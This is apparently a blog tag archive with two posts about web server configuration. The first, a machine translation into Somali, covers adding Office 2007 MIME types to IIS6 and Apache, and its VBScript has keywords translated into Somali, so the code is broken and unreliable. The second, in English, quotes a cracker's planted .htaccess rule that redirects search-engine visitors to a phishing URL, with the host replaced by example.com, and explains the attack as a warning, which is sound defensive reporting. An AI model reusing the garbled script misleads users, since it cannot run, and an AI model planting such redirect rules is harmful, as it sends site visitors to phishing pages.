Tag-Archive for » htaccess «

Sabti, 21-ka Febraayo, 2009 | Qoraa:

Noocyada dukumiintiga ee cusub Xafiiska 2007 waxay siisay qaar ka mid ah martigaliyayaasha webka dhibaatooyin markay macaamiishooda rabaan inay siiyaan dukumiintiyo loogu soo dejisto. Inta badan, dukumintiyada waxaa bixiya adeegaha shabakada sida “qoraal / html” taas oo markaa loo bixiyo tan oo ah qashin shaashadda isticmaalaha websaydhka.

Habka ugu fiican ee tan lagu xallin karo waa in lagu daro dhammaan MIME noocyada qaabeynta ugu weyn ee serverka. IIS7 for Windows horeyba waxay u leeyihiin noocyadan MIME si sax ah ayaa loo dejiyay. IIS6 iyo IIS5 waxay u baahan yihiin noocyada MIME in lagu daro, sida laga yaabaa Apache rakibidda hore. Wixii Apache, sidoo kale waxaa jira shaqo ka shaqeysiin milkiilaha domain shaqsi ah inuu ku daro noocyada mime via Apache’s .htaccess faylka.

IIS 6 Nooca MIME ku darista (ee Maamulaha Server)

Kahor intaan tan la samayn, hubi in adeegahaaga sidoo kale loo dejiyay inuu u oggolaado sixitaanka metabase toos ah:

  1. Xamuul Maamulaha IIS: Bilow -> Ra, “inetmgr” -> [OK]
  2. Midig u guji “server” oo guji “Properties”
  3. Gudaha “Adeegyada Macluumaadka Internetka” tab (badiyaa tabka keliya), hubi in “Enkartaan Direct Metabase Edit” sanduuqa ayaa la hubiyaa.
  4. Click [OK]

Hubso inaad dib u habeynta IIS (here loogu talagalay IIS5) ka hor. Ma qaadi doono wax masuuliyad ah maamul jabinaya adeegeisa. Waxaan haystaa sabab aan ku rumaysto tan laga yaabaa sidoo kale ka shaqee IIS5 si kastaba ha ahaatee waxaan haystaa sabab aad u badan oo aan ku rumaysan karo inay khaladaad badan bixin karto. Haddii ay tahay IIS5 / Windows 2000 admin wuxuu diyaar u yahay inuu tan ii tijaabiyo ka dib markii aan taageeray qaabeyntaada fadlan ii soo sheeg natiijooyinka.

Nuqul qoraalka soo socda u gal feyl la yiraahdo msoff07-addmime.vbs oo fuliya mar ka amraya taliska adigoo garaacaya qoraal msoff07-addmime.vbs oo riixaya gala. Haddii aad maamusho wax ka badan hal jeer, noocyada MIME ayaa lagu dari doonaa wakhti kasta waxaadna lahaan doontaa qoraallo badan oo isku mid ah:

'Qoraalkani wuxuu ku darayaa Xafiiska lagama maarmaanka ah 2007 Noocyada MIME ee IIS 6 Server.
'Inaad adeegsato qoraalkan, kaliya laba-guji ama ka dhaqan khad amarka ah.
'Ku socodsiinta qoraalkan dhowr jeer waxay keeneysaa galitaanno badan oo ka mid ah
'IIS MimeMap marka waa inaadan socodsiin wax ka badan hal jeer.
'Waxaa laga beddelay http://msdn.microsoft.com/en-us/library/ms752346.aspx
 
Miisaan MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
Const ADS_PROPERTY_UPDATE = 2 
 
Calan noocyada MIME lagu daro
MimeTypesToAddArray = Diyaarin(".docm", "application/vnd.ms-word.document.macroEnabled.12", _
".docx", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application/vnd.ms-word.template.macroEnabled.12", _
".dotx", "application/vnd.openxmlformats-officedocument.wordprocessingml.template", _
".potm", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "application/vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "application/vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "application/vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "application/vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application/vnd.ms-excel.template.macroEnabled.12", _
".xltx", "application/vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
Soo qaado shayga mimemap-ka
Deji MimeMapObj = GetObject("IIS://LocalHost / MimeMap")
 
'Wac AddMimeType nooc kasta oo kordhin ah / nooc MIME ah
Wixii miiska = 0 si ay u UBound(MimeTypesToAddArray) Tallaabada 2
    AddMimeType MimeTypesToAddArray(miiska), MimeTypesToAddArray(miiska+1)
Xiga
 
Abuur shey Shell
Deji WshShell = Abuuritaan("WScript.Shell")
 
'Jooji oo Bilow Adeegga IIS
Deji oExec = WshShell.Ful("net stop w3svc")
Samee Halka oExec.Xaaladda = 0
    WScript.Hurdo 100
Loop
 
Deji oExec = WshShell.Ful("net start w3svc")
Samee Halka oExec.Xaaladda = 0
    WScript.Hurdo 100
Loop
 
Deji oExec = Waxba
 
Xaaladda uga warbixi isticmaalaha
WScript.Echo "Microsoft Office 2007 Dukumentiyada noocyada MIME ayaa la diiwaangeliyey."
 
'AddMimeType Sub
Sub AddMimeType (Dheeraad ah, MType)
 
    'Khariidadaha ka soo qaado guriga MimeMap.
    MimeMapArray = MimeMapObj.GetEx("MimeMap") 
 
    'Ku dar khariidad cusub.
    i = UBound(MimeMapArray) + 1
    Redim Kaydso MimeMapArray(i)
    Deji MimeMapArray(i) = Abuuritaan("MimeMap")
    MimeMapArray(i).Kordhin = Dheeraad ah
    MimeMapArray(i).Nooca = MType
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.SetInfo
 
Dhammaad Sub

Apache MIME ku darista nooca (ee Maamulaha Server)

Apache waxay ku kaydisaa noocyadeeda MIME feyl caadi ahaan ku yaal $nooca loo yaqaan 'installpath / conf / mime.types. Eeg mod_mime dukumiinti wixii faahfaahin ah ee ku saabsan sida ay u shaqeyso. Arch Linux rakibto noocyadeeda MIME at /iwm / httpd / conf / mime.types iyo Isbarbar dhigga Plesk ku rakibto /usr / maxaliga / psa / admin / conf / mime.types. Waxaa laga yaabaa in qeybintaada ay ku hayso meel kale, markaa raadso noocyada faylka adoo ordaya hel noocyada mime.

Kudar khadadka soo socda feylkaaga mime.types:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Apache MIME ku darista nooca (For the domain owner with at least FTP accessusing .htaccess file)

Add the following text to your domain’s .htaccess faylka, most commonly in an httpdocs/ directory

AddType application/vnd.ms-word.document.macroEnabled.12 docm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application/vnd.ms-word.template.macroEnabled.12 dotm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType application/vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType application/vnd.openxmlformats-officedocument.presentationml.template potx
AddType application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType application/vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType application/vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType application/vnd.ms-excel.addin.macroEnabled.12 xlam
AddType application/vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType application/vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx
AddType application/vnd.ms-excel.template.macroEnabled.12 xltm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.template xltx
Share
Thursday, January 22nd, 2009 | Qoraa:

I very recently found a problem with a client’s web site due to a .htaccess faylka. The site was hosted on a Windows server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Dabcan, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

Share